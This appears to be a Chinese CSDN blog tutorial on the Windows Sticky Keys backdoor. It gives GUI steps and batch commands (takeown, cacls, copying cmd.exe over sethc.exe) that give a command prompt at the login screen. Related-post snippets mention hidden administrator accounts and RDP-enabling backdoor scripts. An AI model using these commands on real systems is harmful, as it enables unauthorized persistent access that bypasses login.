粘滞键后门

最新推荐文章于 2024-03-14 14:58:18 发布
最新推荐文章于 2024-03-14 14:58:18 发布
阅读量228 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wh00000001/article/details/132176123
版权

介绍

粘滞键后门是一种恶意软件攻击技术,它利用了操作系统中的一个特性,即将键盘上的某个按键设置为"粘滞",即按下一次后会一直保持按下的状态,直到再次按下该键。攻击者可以利用这个特性来创建一个后门,使受害者的系统在不知情的情况下执行恶意操作。

图形化界面复现过程

一、狸猫换太子

1. 将C:\Windows\System32目录下的sethc.exe文件更名为sethc.exe.bak,用作备份文件。

        ①右键sethc.exe文件,选择属性,然后如图操作

②在sethc.exe的高级安全设置界面,如图操作

 ③将当前所有者从更改为我们的管理员账号

 ④确定更改后,继续点击确定

 ⑤回到sethc.exe属性界面处,点击编辑,对权限进行更改

 ⑥权限勾选上完全控制,然后确定保存退出

 ⑦更改文件名为【sethc.exe.bak】

2. 在C:\Windows\System32目录下找到【cmd.exe】文件,将其复制出一个副本文件

 3. 更改【cmd-副本.exe】文件名为【sethc.exe】

二、测试

 

 大功告成!

即便在用户登录界面,依旧能启用:

bat文件快速复现过程

takeown /F C:\Windows\System32\sethc.exe /A
cacls C:\Windows\System32\sethc.exe /E /G administrators:F
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
命令作用
takeown /F C:\Windows\System32\sethc.exe /A这个命令使用 takeown 工具,试图将 C:\Windows\System32\sethc.exe 文件的所有权设置为管理员(/A 表示所有管理员)。这样一来,攻击者可以获取对该文件的控制权。
cacls C:\Windows\System32\sethc.exe /E /G administrators:F这个命令使用 cacls 工具,试图修改 C:\Windows\System32\sethc.exe 文件的访问控制列表(ACL),将管理员(administrator)的权限设置为完全控制(/G 参数表示授权)。这将使攻击者可以完全控制该文件。
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe这个命令试图将 C:\Windows\System32\cmd.exe(命令提示符)复制到 C:\Windows\System32\sethc.exe,覆盖原来的 sethc.exe 文件。通过这种方式,攻击者将命令提示符覆盖了 Sticky Keys 功能,实际上将命令提示符与 Sticky Keys 绑定在一起,从而在登录屏幕上执行命令。

测试:

 大功告成!

温馨提示:请勿在自己电脑上尝试,如若尝试,后果自负

紈子
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
粘滞后门详述
发哥微课堂
03-07 8677
0x00:介绍 首先介绍一下粘滞粘滞很多人都知道,windows 系统下连续按 5 次 shift 可调出其程序,但使用可能有一部分人不太了解,毕竟这个功能一般我们都用不到,粘滞是为了那些按钮有困难的人设计的,也可理解为残疾,就是按困难,一次只能按一个的这种需求,那么如果用 ctrl+c,ctrl+v 这种快捷或者其他需要组合的时,就会有困难,不具备一次按两个或多个的能力,那么...
可自删除 开启3389创建用户粘滞后门的vbs
09-06
### 可自删除开启3389创建用户粘滞后门的VBS脚本解析 #### 一、概述 本文将对一个特定的VBS(Visual Basic Script)脚本进行详细分析,该脚本的功能是开启3389端口,并通过创建用户和设置粘滞后门来实现远程...
(windows图形化界)粘滞后门
m0_60936698的博客
03-02 511
(windows图形化界)粘滞后门 思路:windows图形化界面未登入用户时,连按5次Shift粘滞的程序依然可以弹出,若若把粘滞的程序改为其他程序则有不一样的效果(如cmd程序)。 一、手动直接修改文件名 ①在windows 中C:\Windows\System32下找到sethc.exe(辅助功能快捷),发现无法直接修改文件名且提示《您需要TrustedInstaller提供的权限才能对此文件进行更改》,没有权限,权限属于另一个用户组。 ②在管理员权限下修改se.
Windows粘滞后门
最新发布
carmi的博客
03-14 761
此时假如该设备设置了这种粘滞的话就可以通过调出cmd窗口(管理员状态)进行用户的创建,并将该用户归入到管理员组当中,就可以实现没有用户信息即可登入设备的操作——粘滞后门。在C:/Windows/System32这个目录(系统进程的目录)下可找到粘滞sethc这个应用程序(系统进程)。出现这种情况的原因是:由于刚刚已经将权限给到管理员,但管理员的权限始终未变化,所以还是不能修改文件名称(提高)。右cmd属性打开发现Administrators这个组的成员根本没有对该文件的完全控制权限。
粘滞后门-自动创建-批处理版(axun)
11-25
攻击者可以通过编写特定的批处理脚本(如压缩包中的"粘滞后门.bat"),利用粘滞功能来创建一个不易被察觉的后门。这种后门可能允许远程访问、执行任意代码或者进行其他恶意操作。 批处理文件(.bat)是基于DOS...
一个delphi和C写的粘滞后门
06-03
标题 "一个delphi和C写的粘滞后门" 提示了这个压缩包包含的是一个用 Delphi 和 C 语言编写的恶意软件样本,具体来说是一个利用“粘滞”功能的后门程序。粘滞是 Windows 操作系统中的一个辅助功能,允许用户在...
SHIFT后门Delphi代码
05-28
SHIFT后门Delphi代码,相信喜欢研究这个工具朋友,一定会很高兴。
服务器后门(cmd使用)
03-24
这里将`explorer.exe`(Windows资源管理器)复制到`sethc.exe`的位置,`sethc.exe`是Windows中的粘滞实用程序,通常用于辅助功能。通过替换`sethc.exe`,攻击者可以在不引起怀疑的情况下运行自定义代码。 #### ...
win10原版粘滞文件
08-05
win10原版粘滞文件
win10中关于用粘滞留下后门
qq_42761527的博客
08-19 3901
win10中的连按五下Shift会出现粘滞,那么怎么利用这一漏洞当作后门,登陆别人电脑呢 先要了解粘滞和命令提示符的快捷应用是sethc.exe和cmd.exe 而且这两个文件都在win10的c盘下的system32中 通过以上几条命令留下后门 当你在接触别人电脑时,可以通过连续五下shift启动命令提示符,在命令提示符中修改用户登录口令 ...
沾滞shift后门
Jietewang的博客
02-05 1915
1. 简介 沾滞的目的是为了帮助那些按有困难的人设计的
关于windows的粘滞后门漏洞
qq_52134654的博客
06-30 2645
该漏洞仅适用于Windows7及以下的windows操作系统。粘滞是一种快捷,是为同时按下两个或多个有困难的人而设计的,要功能是方便Shift、Ctrl、Alt与其他的组合使用。启动粘滞可通过单击“开始→设置→控制面板→辅助功能选项”,在“盘”选项卡下选中“使用粘滞”来启动。或者连续按shift五次。开启粘滞的时候,任务栏右边的系统托盘区会出现粘滞图标。...
逆向某粘滞后门
m4s7er的专栏
12-10 1243
前几天有基友在群里发了一个shift后门求逆,最近正好开始学习一些逆向知识,就下载下来练练手。 下载下来拖入虚拟机打开,5下shift运行后发现是一个高仿shift后门,peid查壳是ASProtect壳,载入OD脚本脱壳,把脱壳之后的程序再次拖入peid,发现是一个VB写的后门。 高仿shift后门需要激活,一般的激活方式就是鼠标动作激活或者热激活。用VB Decompiler把程
Windows留后门--教程(五)——shift粘贴后门
W小哥
03-16 4345
一、shift粘贴后门介绍 Shift粘滞是当用户连按5次shift就会自动弹出的一个程序,其实不光是粘滞,还有各种辅助功能,这类辅助功能都拥有一个特点就是当用户未进行登录时也可以触发。所以攻击者很有可能通过篡改这些辅助功能的指向程序来达到权限维持的目的。 (辅助功能镜像劫持是一样的原理) 二、shift粘贴后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限 靶机: windows Server2012 IP: 192.168.2
Windows系统隐藏用户及粘贴后门
qq_43590351的博客
09-06 656
Windows系统隐藏用户 该方法是通过建立隐藏账户,制作系统用户远程控制后门,维持目标Windows 系统权限。制作方法跟步骤如下: 已经获取系统权限执行添加用户操作 net user hahaha$ Aa123456 /add net localgroup administrators hahaha$ /add net user 如上图,我们已经创建成功,执行net user命令,发现是看不到hahaha$用户的: 但是这就结束了吗,没有!虽然上面net user看不见该隐藏用户, 但是在控制面
linux权限介绍之-粘滞权限t-让文件可读写不可删
weixin_34259559的博客
04-07 241
一个系统一般都是有多个账号使用的,而有些目录和文件需要赋予其他用户可读写的权限,比如/tmp/a.tmp 这就有一个问题了,比如A在/tmp目录下放的文件a.tmp,而B也需要有/tmp的权限,他就可以删除这个a.tmp文件; 如果只想让b有读写这个文件的权限,但是没有删除这个文件的权限该怎么办呢?这时候就可以利用t位,粘着位权限 测试如下: ...
利用sethc.exe粘滞文件破解密码进系统小健
runus
01-20 1356
利用sethc.exe粘滞文件破解密码进系统小健 发表于 系统 | 2010年5月13日 13:45:45 | 浏览:264 | 我要当猩猩 评论:(3)今天安装系统遇到非常棘手的问题,一台笔记本,光驱坏了,不能光驱启动,没有USB启动,进系统的时候,要求输入密码,而我密码却不知道,进不去系统。 请问你怎么破掉密码进系统? 或者重装安装XP系统? 方法是人想出来的,于是我开始研究,...
windows 粘滞
08-03
Windows粘滞是一种功能,它可以使得按在按下后保持按住的状态,而不需要一直按住盘。然而,有时候粘滞可能会导致一些不便,比如在按下Shift、Ctrl、Alt等时会发出滴滴声,影响打字。为了解决这个问题,可以采取以下方法关闭粘滞。 方法一:通过设置界面关闭粘滞。在Windows 10中,可以通过按下Win + U组合打开“轻松使用”设置界面,然后选择“盘”选项卡,在“粘滞”部分将其关闭。[1] 方法二:通过注册表关闭粘滞。这种方法需要小心操作,因为修改注册表可能会对系统造成影响。可以按照提供的链接中的步骤进行操作,具体步骤可以参考链接中的内容。[3] 需要注意的是,有些情况下关闭粘滞后可能会自动重新启动。如果遇到这个问题,可以尝试先关闭杀毒软件,然后再重复上述两种方法,这样可能可以解决问题。[2] 希望以上方法对您关闭Windows粘滞有所帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值